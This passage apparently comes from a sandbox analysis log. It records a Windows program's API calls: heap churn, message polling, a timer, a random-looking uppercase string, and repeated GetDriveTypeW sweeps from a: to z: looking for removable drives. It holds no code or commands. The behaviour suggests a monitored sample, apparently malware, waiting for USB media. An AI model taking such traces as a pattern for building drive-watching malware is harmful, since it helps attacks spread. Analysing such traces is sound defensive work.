(HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0216.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.764] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0216.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0216.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0216.764] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0216.764] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0216.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0216.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.764] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0216.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0216.765] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.765] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0216.766] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0216.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.766] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0216.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0216.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.766] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.766] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.766] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.767] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.768] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.768] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.768] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.768] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.768] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.769] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.769] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.769] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.769] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.769] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.770] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.770] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.771] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.771] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.771] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.771] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.771] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.772] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.772] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.772] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.772] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.772] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.773] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0216.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0216.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.774] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.774] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.774] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.774] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.774] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.774] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f80 [0216.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f80 | out: hHeap=0x12c0000) returned 1 [0216.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0216.775] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0216.775] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0216.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0216.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.776] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0216.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0216.776] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.776] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.776] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0216.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.777] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.777] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.777] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.778] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.778] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.778] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.778] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.778] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.778] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.779] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.779] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.779] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.779] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.779] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.780] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.780] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.780] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.780] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.780] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.781] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.781] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.781] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.781] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.781] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.782] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.782] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.782] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0216.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0216.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.783] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0216.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0216.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0216.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0216.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0216.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0216.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0216.785] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0216.785] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0216.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.786] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.786] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0216.786] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0216.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0216.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.786] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0216.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0216.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0216.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0216.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0216.787] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.787] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.788] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.788] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.788] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.788] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.788] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.788] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.789] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.789] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.789] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.789] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.789] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.790] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.790] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.790] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.790] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.790] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.791] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.791] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.791] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.791] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.791] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.793] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.793] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.793] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.794] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0216.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0216.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.794] RtlAllocateHeap 